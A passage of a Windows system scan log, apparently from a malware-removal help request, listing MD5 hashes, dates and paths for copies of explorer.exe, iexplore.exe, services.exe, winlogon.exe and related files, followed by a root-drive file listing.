[2011/02/25 00:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\SoftwareDistribution\Download\71d84967e1e9a8a414d570c6caa8bb08\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17567_none_b9fc4815c4e292b5\explorer.exe
[2009/10/31 01:34:59 | 002,870,272 | ---- | M] (Microsoft Corporation) MD5=9AAAEC8DAC27AA17B053E6352AD233AE -- C:\Windows\ERDNT\cache86\explorer.exe
[2009/10/31 01:34:59 | 002,870,272 | ---- | M] (Microsoft Corporation) MD5=9AAAEC8DAC27AA17B053E6352AD233AE -- C:\Windows\explorer.exe
[2009/10/31 01:34:59 | 002,870,272 | ---- | M] (Microsoft Corporation) MD5=9AAAEC8DAC27AA17B053E6352AD233AE -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16450_none_adc508f19359a007\explorer.exe
[2009/08/03 00:49:47 | 002,613,248 | ---- | M] (Microsoft Corporation) MD5=9FF6C4C91A3711C0A3B18F87B08B518D -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20500_none_b8d95faae0af7617\explorer.exe
[2010/11/20 08:24:45 | 002,872,320 | ---- | M] (Microsoft Corporation) MD5=AC4C51EB24AA95B77F705AB159189E24 -- C:\Windows\SoftwareDistribution\Download\488053cdbca3231eeb2c2af7236d09ed\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_afdaac81905bf900\explorer.exe
[2009/10/31 01:38:38 | 002,870,272 | ---- | M] (Microsoft Corporation) MD5=B8EC4BD49CE8F6FC457721BFC210B67F -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20563_none_ae46d6aeac7ca7c7\explorer.exe
[2009/08/03 00:35:50 | 002,613,248 | ---- | M] (Microsoft Corporation) MD5=B95EEB0F4E5EFBF1038A35B3351CF047 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16404_none_b853c407c78e3ba9\explorer.exe
[2009/07/13 20:39:10 | 002,868,224 | ---- | M] (Microsoft Corporation) MD5=C235A51CB740E45FFA0EBFB9BAFCDA64 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16385_none_ada998b9936d7566\explorer.exe
[2009/10/31 01:00:51 | 002,614,272 | ---- | M] (Microsoft Corporation) MD5=C76153C7ECA00FA852BB0C193378F917 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20563_none_b89b8100e0dd69c2\explorer.exe
[2011/02/26 01:26:45 | 002,870,784 | ---- | M] (Microsoft Corporation) MD5=E38899074D4951D31B4040E994DD7C8D -- C:\Windows\SoftwareDistribution\Download\71d84967e1e9a8a414d570c6caa8bb08\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20910_none_ae79ed04ac56c4a9\explorer.exe
[2009/08/03 01:17:37 | 002,868,224 | ---- | M] (Microsoft Corporation) MD5=F170B4A061C9E026437B193B4D571799 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16404_none_adff19b5932d79ae\explorer.exe
 
< MD5 for: EXPLORER.EXE.MUI  >
[2009/07/13 21:26:48 | 000,022,016 | ---- | M] (Microsoft Corporation) MD5=4B87EEFDC8E253F846A7DFB49A8E6C70 -- C:\Windows\en-US\explorer.exe.mui
[2009/07/13 21:26:48 | 000,022,016 | ---- | M] (Microsoft Corporation) MD5=4B87EEFDC8E253F846A7DFB49A8E6C70 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer.resources_31bf3856ad364e35_6.1.7600.16385_en-us_61e778c48d52d19b\explorer.exe.mui
[2009/07/13 21:06:56 | 000,022,016 | ---- | M] (Microsoft Corporation) MD5=B9F4B1CA23D60775736059D72BA48526 -- C:\Windows\SysWOW64\en-US\explorer.exe.mui
[2009/07/13 21:06:56 | 000,022,016 | ---- | M] (Microsoft Corporation) MD5=B9F4B1CA23D60775736059D72BA48526 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer.resources_31bf3856ad364e35_6.1.7600.16385_en-us_6c3c2316c1b39396\explorer.exe.mui
 
< MD5 for: IEXPLORE.EXE  >
[2011/11/05 00:28:03 | 000,696,600 | ---- | M] (Microsoft Corporation) MD5=0377589BF14A6E5667B730D6D6DB59B4 -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16912_none_0fae4f323e42a646\iexplore.exe
[2011/04/22 15:15:52 | 000,696,592 | ---- | M] (Microsoft Corporation) MD5=281C23EC5BCB1853A5D571F1A6E52FB1 -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.20949_none_101e7c5957724e1d\iexplore.exe
[2009/07/13 20:17:29 | 000,673,048 | ---- | M] (Microsoft Corporation) MD5=2C32E3E596CFE660353753EABEFB0540 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16385_none_19ba3f8a72d988f3\iexplore.exe
[2011/12/16 03:03:08 | 000,673,048 | ---- | M] (Microsoft Corporation) MD5=38668C6CADABC9487C683FADD3D165D0 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16930_none_19eb591872b56d75\iexplore.exe
[2011/08/19 23:35:15 | 000,673,024 | ---- | M] (Microsoft Corporation) MD5=41FE5E37EFE0B587A688BA0E4FA41288 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16869_none_19d3ea0872c5a830\iexplore.exe
[2011/11/05 00:34:31 | 000,696,600 | ---- | M] (Microsoft Corporation) MD5=441C397A9ECF07747920F7F5E40B419B -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.21085_none_0fef13a357968bc7\iexplore.exe
[2010/11/04 00:54:54 | 000,673,040 | ---- | M] (Microsoft Corporation) MD5=58CF468D3FF4CF830339FE5E45356355 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16700_none_1a0bc510729d1f54\iexplore.exe
[2011/04/22 14:29:16 | 000,673,040 | ---- | M] (Microsoft Corporation) MD5=64EFAF916C4009F1B84153D0BB491FB0 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16800_none_1a0bc6f6729d1c7b\iexplore.exe
[2010/11/04 00:54:59 | 000,673,040 | ---- | M] (Microsoft Corporation) MD5=6B2258FF6D2332073FE9E90122FA4168 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.20831_none_1a75f2618bd22c48\iexplore.exe
[2011/06/21 01:14:22 | 000,696,592 | ---- | M] (Microsoft Corporation) MD5=6B2383EDA3956983E3219A62D8408DAB -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.20992_none_0fe16ab757a12871\iexplore.exe
[2011/06/21 00:25:30 | 000,673,040 | ---- | M] (Microsoft Corporation) MD5=6BB506124872ACDFAC5BD912CA1334CE -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.20992_none_1a3615098c01ea6c\iexplore.exe
[2010/12/18 01:17:48 | 000,696,592 | ---- | M] (Microsoft Corporation) MD5=700B40EA39DFB25517A81032F03D6D20 -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16722_none_0fa37b7a3e4ac7e9\iexplore.exe
[2010/11/20 08:28:25 | 000,695,056 | ---- | M] (Microsoft Corporation) MD5=86257731DDB311FBC283534CC0091634 -- C:\Windows\SoftwareDistribution\Download\488053cdbca3231eeb2c2af7236d09ed\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7601.17514_none_1196a9003b674a92\iexplore.exe
[2010/12/18 01:11:10 | 000,696,592 | ---- | M] (Microsoft Corporation) MD5=8C6C32E4AF8A3D7155656F5897C504E0 -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.20861_none_1000d84b5789be20\iexplore.exe
[2011/11/04 23:38:00 | 000,673,048 | ---- | M] (Microsoft Corporation) MD5=8ED7C19AEFA3673AADB0D6864B03FBCE -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16912_none_1a02f98472a36841\iexplore.exe
[2012/03/08 07:39:49 | 000,748,336 | ---- | M] (Microsoft Corporation) MD5=904E13BA41AF2E353A32CF351CA53639 -- C:\Program Files (x86)\Internet Explorer\iexplore.exe
[2012/03/08 07:39:49 | 000,748,336 | ---- | M] (Microsoft Corporation) MD5=904E13BA41AF2E353A32CF351CA53639 -- C:\Windows\ERDNT\cache86\iexplore.exe
[2012/03/08 07:39:49 | 000,748,336 | ---- | M] (Microsoft Corporation) MD5=904E13BA41AF2E353A32CF351CA53639 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.16421_none_17a944edb4ca4c7a\iexplore.exe
[2010/12/18 00:32:25 | 000,673,040 | ---- | M] (Microsoft Corporation) MD5=9321CF0D023528C71E3645F8433C86C8 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.20861_none_1a55829d8bea801b\iexplore.exe
[2011/06/21 00:37:00 | 000,673,040 | ---- | M] (Microsoft Corporation) MD5=A3AB0A260049BE22AB52E302D9220A92 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16839_none_19f459cc72ad545d\iexplore.exe
[2011/12/16 03:45:57 | 000,696,600 | ---- | M] (Microsoft Corporation) MD5=A3F56CED7B94A30BE8954387F0E2B5D2 -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16930_none_0f96aec63e54ab7a\iexplore.exe
[2011/11/04 23:39:45 | 000,673,048 | ---- | M] (Microsoft Corporation) MD5=A8A14CD0CB499B80412F75D53996AE29 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.21085_none_1a43bdf58bf74dc2\iexplore.exe
[2010/12/18 00:33:54 | 000,673,040 | ---- | M] (Microsoft Corporation) MD5=AA08B68EF4E35EFA170CF85A44B23B70 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16722_none_19f825cc72ab89e4\iexplore.exe
[2011/02/24 00:45:11 | 000,673,040 | ---- | M] (Microsoft Corporation) MD5=AB2BB40A5FE49AD236791AC22BD08869 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.20908_none_1a9d66118bb386fd\iexplore.exe
[2011/08/20 00:46:07 | 000,696,576 | ---- | M] (Microsoft Corporation) MD5=AC1CC7CD5CBE60EFF105BB3C0DC199C5 -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16869_none_0f7f3fb63e64e635\iexplore.exe
[2011/06/21 01:21:24 | 000,696,592 | ---- | M] (Microsoft Corporation) MD5=B38DE184AC135A4B0AE7D286476FA33F -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16839_none_0f9faf7a3e4c9262\iexplore.exe
[2011/02/24 01:29:19 | 000,696,592 | ---- | M] (Microsoft Corporation) MD5=B4881B8F6EDB48CABD44BCC9FB5475C4 -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.20908_none_1048bbbf5752c502\iexplore.exe
[2013/04/04 13:50:32 | 000,218,184 | ---- | M] () MD5=B4C6E3889BB310CA7E974A04EC6E46AC -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\Chameleon\iexplore.exe
[2011/12/16 03:42:35 | 000,696,600 | ---- | M] (Microsoft Corporation) MD5=C152529FD67ABB61F0609EF5A299794C -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.21108_none_104895c75752f56b\iexplore.exe
[2011/12/16 04:19:51 | 000,673,048 | ---- | M] (Microsoft Corporation) MD5=C53E41F92B19EC97D987F968403BEC49 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.21108_none_1a9d40198bb3b766\iexplore.exe
[2010/11/20 07:22:51 | 000,673,040 | ---- | M] (Microsoft Corporation) MD5=C613E69C3B191BB02C7A191741A1D024 -- C:\Windows\SoftwareDistribution\Download\488053cdbca3231eeb2c2af7236d09ed\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7601.17514_none_1beb53526fc80c8d\iexplore.exe
[2011/02/24 00:32:52 | 000,673,040 | ---- | M] (Microsoft Corporation) MD5=C6697A46554E36541E81182B258A19D6 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16766_none_19d0e74472c85f04\iexplore.exe
[2011/08/20 00:42:38 | 000,696,576 | ---- | M] (Microsoft Corporation) MD5=C66C8BF791F9DB974022506265518EE0 -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.21033_none_102322ab576fcd64\iexplore.exe
[2011/04/22 15:16:25 | 000,696,592 | ---- | M] (Microsoft Corporation) MD5=D6F57A9ECB4606076FB9519D1698FCBA -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16800_none_0fb71ca43e3c5a80\iexplore.exe
[2010/11/04 01:37:41 | 000,696,592 | ---- | M] (Microsoft Corporation) MD5=D8E00EA671A1EFE95C69C7566C505AD4 -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16700_none_0fb71abe3e3c5d59\iexplore.exe
[2011/02/24 01:32:09 | 000,696,592 | ---- | M] (Microsoft Corporation) MD5=E1BBDE0F187194D4B08335234A4B9FC7 -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16766_none_0f7c3cf23e679d09\iexplore.exe
[2010/11/04 01:42:22 | 000,696,592 | ---- | M] (Microsoft Corporation) MD5=E220FB009F54AAF649C6A278A5156764 -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.20831_none_1021480f57716a4d\iexplore.exe
[2012/03/08 07:39:37 | 000,754,480 | ---- | M] (Microsoft Corporation) MD5=F1424C1B9B1813BF825E45DF3790BC8A -- C:\Program Files\Internet Explorer\iexplore.exe
[2012/03/08 07:39:37 | 000,754,480 | ---- | M] (Microsoft Corporation) MD5=F1424C1B9B1813BF825E45DF3790BC8A -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.16421_none_0d549a9b80698a7f\iexplore.exe
[2009/07/13 20:43:43 | 000,696,600 | ---- | M] (Microsoft Corporation) MD5=F2B0D41E1D08D0B2006DF5AA2E74C81E -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.16385_none_0f6595383e78c6f8\iexplore.exe
[2011/04/22 14:11:29 | 000,673,040 | ---- | M] (Microsoft Corporation) MD5=F94877A94996B3C12BB31AD722840457 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.20949_none_1a7326ab8bd31018\iexplore.exe
[2011/08/19 23:32:44 | 000,673,024 | ---- | M] (Microsoft Corporation) MD5=FA623BE79902A7B49FF4F21117B63C83 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_8.0.7600.21033_none_1a77ccfd8bd08f5f\iexplore.exe
 
< MD5 for: IEXPLORE.EXE.MUI  >
[2012/03/08 07:39:38 | 000,005,632 | ---- | M] (Microsoft Corporation) MD5=17FAE936C452188D05852DE8D1082013 -- C:\Program Files\Internet Explorer\en-US\iexplore.exe.mui
[2012/03/08 07:39:38 | 000,005,632 | ---- | M] (Microsoft Corporation) MD5=17FAE936C452188D05852DE8D1082013 -- C:\Windows\winsxs\amd64_microsoft-windows-i..-optional.resources_31bf3856ad364e35_9.4.8112.16421_en-us_07013012b816cb66\iexplore.exe.mui
[2012/03/08 07:39:50 | 000,005,632 | ---- | M] (Microsoft Corporation) MD5=4C71CCB3C8817185E67210856778831F -- C:\Program Files (x86)\Internet Explorer\en-US\iexplore.exe.mui
[2012/03/08 07:39:50 | 000,005,632 | ---- | M] (Microsoft Corporation) MD5=4C71CCB3C8817185E67210856778831F -- C:\Windows\winsxs\wow64_microsoft-windows-i..-optional.resources_31bf3856ad364e35_9.4.8112.16421_en-us_1155da64ec778d61\iexplore.exe.mui
[2009/07/13 21:29:20 | 000,005,120 | ---- | M] (Microsoft Corporation) MD5=C29BCFB504E33FEADDFA2D0183CEF62F -- C:\Windows\winsxs\amd64_microsoft-windows-i..-optional.resources_31bf3856ad364e35_8.0.7600.16385_en-us_09122aaf762607df\iexplore.exe.mui
[2009/07/13 21:29:20 | 000,005,120 | ---- | M] (Microsoft Corporation) MD5=C29BCFB504E33FEADDFA2D0183CEF62F -- C:\Windows\winsxs\amd64_microsoft-windows-i..-optional.resources_31bf3856ad364e35_8.0.7601.17514_en-us_0b433e7773148b79\iexplore.exe.mui
[2009/07/13 21:05:06 | 000,005,120 | ---- | M] (Microsoft Corporation) MD5=FBA4CD95930248053A2C3F43CA70B986 -- C:\Windows\winsxs\wow64_microsoft-windows-i..-optional.resources_31bf3856ad364e35_8.0.7600.16385_en-us_1366d501aa86c9da\iexplore.exe.mui
[2009/07/13 21:05:06 | 000,005,120 | ---- | M] (Microsoft Corporation) MD5=FBA4CD95930248053A2C3F43CA70B986 -- C:\Windows\winsxs\wow64_microsoft-windows-i..-optional.resources_31bf3856ad364e35_8.0.7601.17514_en-us_1597e8c9a7754d74\iexplore.exe.mui
 
< MD5 for: SERVICES  >
[2009/06/10 16:00:26 | 000,017,463 | ---- | M] () MD5=D9E1A01B480D961B7CF0509D597A92D6 -- C:\Windows\winsxs\amd64_microsoft-windows-w..nfrastructure-other_31bf3856ad364e35_6.1.7600.16385_none_6079f415110c0210\services
 
< MD5 for: SERVICES.CFG  >
[2012/07/27 15:51:34 | 000,586,083 | ---- | M] () MD5=6DE4EA437EC1FE6DB27CADB0A7EA8DC2 -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Services\Services.cfg
 
< MD5 for: SERVICES.EXE  >
[2009/07/13 20:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\ERDNT\cache64\services.exe
[2009/07/13 20:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\SysNative\services.exe
[2009/07/13 20:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\services.exe
 
< MD5 for: SERVICES.EXE.MUI  >
[2009/07/13 21:25:40 | 000,017,408 | ---- | M] (Microsoft Corporation) MD5=6507BF0DC2D1F5F32493C288EAA59277 -- C:\Windows\SysNative\en-US\services.exe.mui
[2009/07/13 21:25:40 | 000,017,408 | ---- | M] (Microsoft Corporation) MD5=6507BF0DC2D1F5F32493C288EAA59277 -- C:\Windows\winsxs\amd64_microsoft-windows-s..ontroller.resources_31bf3856ad364e35_6.1.7600.16385_en-us_c5f238be3fa63468\services.exe.mui
 
< MD5 for: SERVICES.H  >
[2012/08/29 09:50:46 | 000,001,043 | ---- | M] () MD5=EFA6260E75D8055649F88462E3E9E929 -- C:\Program Files\MySQL\MySQL Server 5.5\include\mysql\services.h
[2012/07/20 18:38:04 | 000,001,043 | ---- | M] () MD5=EFA6260E75D8055649F88462E3E9E929 -- C:\Users\Wesley\Desktop\Oblivion Mods\xampp-win32-1.8.1-VC9\xampp\mysql\include\mysql\services.h
 
< MD5 for: SERVICES.LNK  >
[2009/07/13 23:54:05 | 000,001,288 | ---- | M] () MD5=CA0D9F4743DFF86EBAF09D763139E958 -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk
[2009/07/13 23:54:05 | 000,001,288 | ---- | M] () MD5=CA0D9F4743DFF86EBAF09D763139E958 -- C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk
 
< MD5 for: SERVICES.MOF  >
[2009/06/10 15:44:06 | 000,002,866 | ---- | M] () MD5=26A11C895A7F0B6D32105EBE127D8500 -- C:\Windows\SysNative\wbem\services.mof
[2009/06/10 15:44:06 | 000,002,866 | ---- | M] () MD5=26A11C895A7F0B6D32105EBE127D8500 -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\services.mof
 
< MD5 for: SERVICES.MSC  >
[2009/07/13 21:23:30 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysNative\en-US\services.msc
[2009/06/10 15:38:36 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysNative\services.msc
[2009/07/13 21:08:50 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysWOW64\en-US\services.msc
[2009/06/10 16:21:09 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysWOW64\services.msc
[2009/07/13 21:23:30 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\amd64_microsoft-windows-s..cessnapin.resources_31bf3856ad364e35_6.1.7600.16385_en-us_003408aa160fce5b\services.msc
[2009/06/10 15:38:36 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\amd64_microsoft-windows-servicessnapin_31bf3856ad364e35_6.1.7600.16385_none_2b58d44b5f6beb8a\services.msc
[2009/07/13 21:08:50 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\x86_microsoft-windows-s..cessnapin.resources_31bf3856ad364e35_6.1.7600.16385_en-us_a4156d265db25d25\services.msc
[2009/06/10 16:21:09 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\x86_microsoft-windows-servicessnapin_31bf3856ad364e35_6.1.7600.16385_none_cf3a38c7a70e7a54\services.msc
 
< MD5 for: SERVICES.PTXML  >
[2009/07/13 15:16:17 | 000,001,061 | ---- | M] () MD5=640D7DD61B1CFA6C96F80F68F78CDFA7 -- C:\Windows\SysNative\wdi\perftrack\Services.ptxml
[2009/07/13 15:16:17 | 000,001,061 | ---- | M] () MD5=640D7DD61B1CFA6C96F80F68F78CDFA7 -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\Services.ptxml
 
< MD5 for: SERVICES.RDB  >
[2010/05/21 00:34:38 | 000,262,144 | ---- | M] () MD5=00D8C85E07B0D69A27816B54E56EF85B -- C:\Program Files (x86)\OpenOffice.org 3\URE\misc\services.rdb
[2010/05/21 00:28:42 | 005,505,024 | ---- | M] () MD5=20999743CA8D1F7132B0BFCE952F2295 -- C:\Program Files (x86)\OpenOffice.org 3\Basis\program\services.rdb
 
< MD5 for: WINLOGON.ADML  >
[2009/07/13 21:25:22 | 000,008,013 | ---- | M] () MD5=CED0EAD8D152B3D0F114698DE2316C5E -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon-adm.resources_31bf3856ad364e35_6.1.7600.16385_en-us_f0f9032ef6930070\WinLogon.adml
 
< MD5 for: WINLOGON.ADMX  >
[2009/06/10 16:04:41 | 000,005,237 | ---- | M] () MD5=89D8F50E186A16C2CED3CF36DBBC0B2C -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon-adm_31bf3856ad364e35_6.1.7600.16385_none_d7024e6992f3424d\WinLogon.admx
 
< MD5 for: WINLOGON.EXE  >
[2010/11/20 08:25:30 | 000,390,656 | ---- | M] (Microsoft Corporation) MD5=1151B1BAA6F350B1DB6598E0FEA7C457 -- C:\Windows\SoftwareDistribution\Download\488053cdbca3231eeb2c2af7236d09ed\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.17514_none_cde90685eb910636\winlogon.exe
[2009/07/13 20:39:52 | 000,389,120 | ---- | M] (Microsoft Corporation) MD5=132328DF455B0028F13BF0ABEE51A63A -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.16385_none_cbb7f2bdeea2829c\winlogon.exe
[2009/10/28 02:01:57 | 000,389,632 | ---- | M] (Microsoft Corporation) MD5=A93D41A4D4B0D91C072D11DD8AF266DE -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.20560_none_cc522fd507b468f8\winlogon.exe
[2013/04/04 13:50:32 | 000,218,184 | ---- | M] () MD5=B4C6E3889BB310CA7E974A04EC6E46AC -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\Chameleon\winlogon.exe
[2009/10/28 01:24:40 | 000,389,632 | ---- | M] (Microsoft Corporation) MD5=DA3E2A6FA9660CC75B471530CE88453A -- C:\Windows\ERDNT\cache64\winlogon.exe
[2009/10/28 01:24:40 | 000,389,632 | ---- | M] (Microsoft Corporation) MD5=DA3E2A6FA9660CC75B471530CE88453A -- C:\Windows\SysNative\winlogon.exe
[2009/10/28 01:24:40 | 000,389,632 | ---- | M] (Microsoft Corporation) MD5=DA3E2A6FA9660CC75B471530CE88453A -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.16447_none_cbe534e7ee8042ad\winlogon.exe
 
< MD5 for: WINLOGON.EXE.MUI  >
[2010/11/20 08:00:25 | 000,023,040 | ---- | M] (Microsoft Corporation) MD5=34C7D2E30868EDAFB191341D963ABA5F -- C:\Windows\SoftwareDistribution\Download\488053cdbca3231eeb2c2af7236d09ed\amd64_microsoft-windows-winlogon.resources_31bf3856ad364e35_6.1.7601.17514_en-us_291e96fa1ab5fc7b\winlogon.exe.mui
[2009/07/13 21:29:52 | 000,022,528 | ---- | M] (Microsoft Corporation) MD5=56D03B64B8C483C1D12A8E4577B3B332 -- C:\Windows\SysNative\en-US\winlogon.exe.mui
[2009/07/13 21:29:52 | 000,022,528 | ---- | M] (Microsoft Corporation) MD5=56D03B64B8C483C1D12A8E4577B3B332 -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon.resources_31bf3856ad364e35_6.1.7600.16385_en-us_26ed83321dc778e1\winlogon.exe.mui
 
< MD5 for: WINLOGON.MFL  >
[2009/07/13 21:27:22 | 000,001,080 | ---- | M] () MD5=2783ED50691284F7EAE6BE9729337E1A -- C:\Windows\SysNative\wbem\en-US\winlogon.mfl
[2009/07/13 21:27:22 | 000,001,080 | ---- | M] () MD5=2783ED50691284F7EAE6BE9729337E1A -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon-mof.resources_31bf3856ad364e35_6.1.7600.16385_en-us_84afd4fd38ffd276\winlogon.mfl
 
< MD5 for: WINLOGON.MOF  >
[2009/07/13 15:30:01 | 000,003,192 | ---- | M] () MD5=DF722B96F32A61783BC310FACF10240B -- C:\Windows\SysNative\wbem\winlogon.mof
[2009/07/13 15:30:01 | 000,003,192 | ---- | M] () MD5=DF722B96F32A61783BC310FACF10240B -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon-mof_31bf3856ad364e35_6.1.7600.16385_none_dc2dbb778f98e40f\winlogon.mof
 
< %SYSTEMDRIVE%\*.* >
[2013/04/20 10:47:58 | 000,000,009 | ---- | M] () -- C:\END
[2007/11/07 08:00:40 | 000,017,734 | ---- | M] () -- C:\eula.1028.txt
[2007/11/07 08:00:40 | 000,017,734 | ---- | M] () -- C:\eula.1031.txt
[2007/11/07 08:00:40 | 000,010,134 | ---- | M] () -- C:\eula.1033.txt
[2007/11/07 08:00:40 | 000,017,734 | ---- | M] () -- C:\eula.1036.txt
[2007/11/07 08:00:40 | 000,017,734 | ---- | M] () -- C:\eula.1040.txt
[2007/11/07 08:00:40 | 000,000,118 | ---- | M] () -- C:\eula.1041.txt
[2007/11/07 08:00:40 | 000,017,734 | ---- | M] () -- C:\eula.1042.txt
[2007/11/07 08:00:40 | 000,017,734 | ---- | M] () -- C:\eula.2052.txt
[2007/11/07 08:00:40 | 000,017,734 | ---- | M] () -- C:\eula.3082.txt
[2007/11/07 08:00:40 | 000,001,110 | ---- | M] () -- C:\globdata.ini
[2013/03/12 16:05:00 | 000,182,764 | ---- | M] () -- C:\gs01.log
[2014/01/02 22:55:39 | 3206,471,680 | -HS- | M] () -- C:\hiberfil.sys
[2007/11/07 07:03:18 | 000,562,688 | ---- | M] (Microsoft Corporation) -- C:\install.exe
